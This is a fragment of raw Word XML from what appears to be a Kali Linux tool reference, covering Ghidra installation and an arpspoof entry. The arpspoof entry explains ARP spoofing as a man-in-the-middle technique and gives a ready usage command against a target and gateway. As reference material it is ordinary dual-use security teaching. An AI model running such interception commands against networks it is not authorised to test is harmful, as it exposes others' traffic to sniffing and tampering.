            <w:shd w:val="clear" w:color="auto" w:fill="D5DCE4" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="6E7F8423" w14:textId="149DA7B2" w:rsidR="00B3003B" w:rsidRDefault="00B3003B" w:rsidP="004B47EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>ghidra</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="002024A0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Ghidra</w:t>
            </w:r>
            <w:r w:rsidRPr="002024A0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> is</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> not</w:t>
            </w:r>
            <w:r w:rsidRPr="002024A0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> installed on Kali Linux</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> by default</w:t>
            </w:r>
            <w:r w:rsidRPr="002024A0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7933" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CFD232F" w14:textId="250C06D9" w:rsidR="00B3003B" w:rsidRDefault="00B3003B" w:rsidP="004B47EA">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1543"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>The NSA’s Software Reverse Engineering (SRE) framework</w:t>
            </w:r>
            <w:r w:rsidR="00C04A6F">
              <w:t>, Ghidra is</w:t>
            </w:r>
            <w:r w:rsidR="00C04A6F" w:rsidRPr="00C04A6F">
              <w:t xml:space="preserve"> a free and </w:t>
            </w:r>
            <w:r w:rsidR="0003791F" w:rsidRPr="00C04A6F">
              <w:t>open-source</w:t>
            </w:r>
            <w:r w:rsidR="00C04A6F" w:rsidRPr="00C04A6F">
              <w:t xml:space="preserve"> reverse engineering tool</w:t>
            </w:r>
            <w:r w:rsidR="00C04A6F">
              <w:t xml:space="preserve"> released to the public in March 2019, it is a competitor to IDA Pro, and written in Java and C++.</w:t>
            </w:r>
            <w:r w:rsidR="004B47EA">
              <w:t xml:space="preserve"> Ghidra </w:t>
            </w:r>
            <w:r w:rsidR="004B47EA" w:rsidRPr="004B47EA">
              <w:t>is well known for its incredible decompiler which converts the assembly in the binary to C.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B3003B" w14:paraId="5C170768" w14:textId="77777777" w:rsidTr="00182AB7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="726" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="35CE0938" w14:textId="513EB31D" w:rsidR="00B3003B" w:rsidRDefault="00B3003B" w:rsidP="004B47EA">
            <w:r>
              <w:t>162.</w:t>
            </w:r>
            <w:r w:rsidR="00B174AB">
              <w:t>b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2368" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="3C447180" w14:textId="0ACFA2FF" w:rsidR="00B3003B" w:rsidRDefault="009B46C6" w:rsidP="004B47EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Terminal</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="009B46C6">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(Ghidra Installation)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7933" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="098C4984" w14:textId="77777777" w:rsidR="00B3003B" w:rsidRDefault="00C04A6F" w:rsidP="004B47EA">
            <w:r>
              <w:t>To install Ghidra, first create a directory for it to be saved into:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0003791F" w:rsidRPr="0003791F">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>mkdir</w:t>
            </w:r>
            <w:r w:rsidR="0003791F">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="0003791F" w:rsidRPr="0003791F">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>~/Documents/Ghidra</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0915BD80" w14:textId="4A25E06D" w:rsidR="0003791F" w:rsidRDefault="0003791F" w:rsidP="004B47EA">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Next, navigate to:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0003791F">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>https://github.com/NationalSecurityAgency/ghidra/releases/tag/Ghidra_10.0.3_build</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:t>And click to download and save the ‘</w:t>
            </w:r>
            <w:r w:rsidRPr="0003791F">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>ghidra_10.0.3_PUBLIC_20210908.zip</w:t>
            </w:r>
            <w:r w:rsidRPr="0003791F">
              <w:t>’</w:t>
            </w:r>
            <w:r w:rsidRPr="0003791F">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>file.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>Now, move this zip file into the newly created directory:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00CA1BBE">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>mv</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00CA1BBE">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>~/Downloads/ghidra_10.0.3_PUBLIC_202</w:t>
            </w:r>
            <w:r w:rsidR="00CA1BBE" w:rsidRPr="00CA1BBE">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>10908.zip</w:t>
            </w:r>
            <w:r w:rsidR="00CA1BBE">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> ~/Documents/Ghidra</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A1FA4DE" w14:textId="7D941B7D" w:rsidR="00CA1BBE" w:rsidRDefault="00CA1BBE" w:rsidP="004B47EA">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00CA1BBE">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>cd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> ~/Documents/Ghidra</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66F734D1" w14:textId="77777777" w:rsidR="00CA1BBE" w:rsidRDefault="00CA1BBE" w:rsidP="004B47EA">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Next, we need to unzip the file:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00CA1BBE">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>unzip</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0003791F">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>ghidra_10.0.3_PUBLIC_20210908.zip</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BD9A118" w14:textId="77777777" w:rsidR="00CA1BBE" w:rsidRDefault="00CA1BBE" w:rsidP="004B47EA">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Ensure that the OpenJDK required dependencies are installed also:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00CA1BBE">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA1BBE">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt-get</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA1BBE">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> install </w:t>
            </w:r>
            <w:r w:rsidRPr="00CA1BBE">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>default-jdk</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46AAB61F" w14:textId="71C23F84" w:rsidR="009B46C6" w:rsidRDefault="009B46C6" w:rsidP="004B47EA">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009B46C6">
              <w:t>You may also need to manually download and unzip the latest OpenJDK (Java Development Kit) if Ghidra asks you to enter the path to the JDK home directory</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">Navigate to: </w:t>
            </w:r>
            <w:r w:rsidRPr="009B46C6">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>https://adoptopenjdk.net/releases.html?variant=openjdk16&amp;jvmVariant=hotspot</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3821D8E5" w14:textId="77777777" w:rsidR="009B46C6" w:rsidRDefault="009B46C6" w:rsidP="004B47EA">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Then, download the latest file, in the ‘Linux .tar.gz’ format and save it:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009B46C6">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">mv </w:t>
            </w:r>
            <w:r w:rsidRPr="009B46C6">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>OpenJDK16U-jdk_x64_linux_hotspot_16.0.2_7.tar.gz</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> ~/Documents/OJDK</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00CA17DF" w14:textId="77777777" w:rsidR="009B46C6" w:rsidRDefault="009B46C6" w:rsidP="004B47EA">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009B46C6">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>cd</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009B46C6">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>~/Documents/OJDK</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D63E362" w14:textId="582E65FF" w:rsidR="009B46C6" w:rsidRDefault="009B46C6" w:rsidP="004B47EA">
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009B46C6">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>tar</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009B46C6">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-xvf</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="0021638E" w:rsidRPr="009B46C6">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> OpenJDK16U-jdk_x64_linux_hotspot_16.0.2_7.tar.gz</w:t>
            </w:r>
            <w:r w:rsidR="0021638E">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="0021638E">
              <w:t xml:space="preserve">This will unzip the file and a new directory will be seen akin to: </w:t>
            </w:r>
            <w:r w:rsidR="0021638E" w:rsidRPr="0021638E">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>jdk-16.0.2+7</w:t>
            </w:r>
            <w:r w:rsidR="0021638E">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="0021638E">
              <w:t xml:space="preserve">Now you can open Ghidra and specifiy the </w:t>
            </w:r>
            <w:r w:rsidR="0021638E" w:rsidRPr="0021638E">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">OJDK </w:t>
            </w:r>
            <w:r w:rsidR="0021638E">
              <w:t>directory if prompted to, after:</w:t>
            </w:r>
            <w:r w:rsidR="0021638E">
              <w:br/>
            </w:r>
            <w:r w:rsidR="0021638E">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0021638E" w:rsidRPr="0021638E">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>cd</w:t>
            </w:r>
            <w:r w:rsidR="0021638E">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="0021638E" w:rsidRPr="0021638E">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>~/Documents/Ghidra/ghidra_10.0.3_PUBLIC</w:t>
            </w:r>
            <w:r w:rsidR="0021638E">
              <w:br/>
            </w:r>
            <w:r w:rsidR="0021638E">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0021638E" w:rsidRPr="0021638E">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>./</w:t>
            </w:r>
            <w:r w:rsidR="0021638E" w:rsidRPr="0021638E">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>ghidraRun</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B3003B" w14:paraId="084F04E9" w14:textId="77777777" w:rsidTr="00182AB7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="726" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="ACB9CA" w:themeFill="text2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="2A7B7BDA" w14:textId="77777777" w:rsidR="00B3003B" w:rsidRDefault="00B3003B" w:rsidP="004B47EA"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2368" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5DCE4" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5E4B11CA" w14:textId="77777777" w:rsidR="00B3003B" w:rsidRDefault="00B3003B" w:rsidP="004B47EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7933" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00F66A0C" w14:textId="77777777" w:rsidR="00B3003B" w:rsidRPr="001E0F42" w:rsidRDefault="00B3003B" w:rsidP="004B47EA"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D5EBBEB" w14:textId="428F0ABE" w:rsidR="00C61232" w:rsidRDefault="00C61232" w:rsidP="00C364A5"/>
    <w:p w14:paraId="049BE368" w14:textId="77777777" w:rsidR="00C61232" w:rsidRDefault="00C61232">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAA3823" w14:textId="5FEC6586" w:rsidR="00C61232" w:rsidRDefault="00C61232" w:rsidP="00C61232">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Testing, DoS and Miscellaneous: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>arpspoof</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="1067"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="726"/>
        <w:gridCol w:w="2368"/>
        <w:gridCol w:w="7933"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C61232" w14:paraId="3B66B911" w14:textId="77777777" w:rsidTr="006E3BDB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="726" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="ACB9CA" w:themeFill="text2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="263862C5" w14:textId="1CE76628" w:rsidR="00C61232" w:rsidRDefault="00C61232" w:rsidP="006E3BDB">
            <w:r>
              <w:t>163.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2368" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5DCE4" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5C31E10D" w14:textId="70571564" w:rsidR="00C61232" w:rsidRDefault="00C61232" w:rsidP="006E3BDB">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>arpspoof</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7933" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23A12151" w14:textId="77777777" w:rsidR="00C61232" w:rsidRDefault="00C61232" w:rsidP="00C61232">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1543"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>ARP spoofing is a method of attacking an Ethernet LAN. ARP spoofing succeeds by changing the IP address of the attacker’s computer to the IP address of the target computer. A forged ARP request and reply packet find a place in the target ARP cache in this process. As the ARP reply has been forged, the destination computer (target) sends the frames to the attacker’s computer, where the attacker can modify them before sending them to the source machine (User A) in an MITM attack.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7787ED13" w14:textId="77777777" w:rsidR="00C61232" w:rsidRDefault="00C61232" w:rsidP="00C61232">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1543"/>
              </w:tabs>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0093A67D" w14:textId="349EEB23" w:rsidR="00C61232" w:rsidRDefault="00C61232" w:rsidP="00C61232">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1543"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>arpspoof redirects packets from a target host (or all hosts) on the LAN intended for another host on the LAN by forging ARP replies. This is an extremely effective way of sniffing traffic on a switch.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C61232" w14:paraId="0278EE5B" w14:textId="77777777" w:rsidTr="00D7793C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="726" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="ACB9CA" w:themeFill="text2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="31F4021C" w14:textId="7D4399D5" w:rsidR="00C61232" w:rsidRDefault="00C61232" w:rsidP="006E3BDB">
            <w:r>
              <w:t>163.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2368" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5DCE4" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="7901C33C" w14:textId="77777777" w:rsidR="00C61232" w:rsidRDefault="00C61232" w:rsidP="006E3BDB">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7933" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D1DF6E9" w14:textId="1164C040" w:rsidR="00C61232" w:rsidRDefault="001F64A3" w:rsidP="00435B4E">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1543"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>To install on Kali, simply enter:</w:t>
            </w:r>
            <w:r w:rsidR="00435B4E">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00435B4E" w:rsidRPr="00435B4E">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001F64A3">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="001F64A3">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt </w:t>
            </w:r>
            <w:r w:rsidRPr="001F64A3">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">install </w:t>
            </w:r>
            <w:r w:rsidRPr="001F64A3">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>dsniff</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F5E5717" w14:textId="77777777" w:rsidR="001F64A3" w:rsidRDefault="001F64A3" w:rsidP="006E3BDB">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1543"/>
              </w:tabs>
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Say ‘Y’ to any prompts, and once the applications have been installed, use:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001F64A3">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">arpspoof </w:t>
            </w:r>
            <w:r w:rsidRPr="001F64A3">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-i </w:t>
            </w:r>
            <w:r w:rsidRPr="00435B4E">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>eth0</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001F64A3">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-t </w:t>
            </w:r>
            <w:r w:rsidRPr="00435B4E">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">TARGET.IP.ADD.RESS </w:t>
            </w:r>
            <w:r w:rsidRPr="00435B4E">
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t>LOCAL.GATE.WAY.IP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32D93AC4" w14:textId="77777777" w:rsidR="00435B4E" w:rsidRDefault="00435B4E" w:rsidP="006E3BDB">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1543"/>
              </w:tabs>
            </w:pPr>
            <w:r w:rsidRPr="00435B4E">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-i </w:t>
            </w:r>
            <w:r w:rsidRPr="00435B4E">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>INTERFACE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00435B4E">
              <w:t xml:space="preserve">Specify </w:t>
            </w:r>
            <w:r>
              <w:t>a</w:t>
            </w:r>
            <w:r w:rsidRPr="00435B4E">
              <w:t>n interface</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
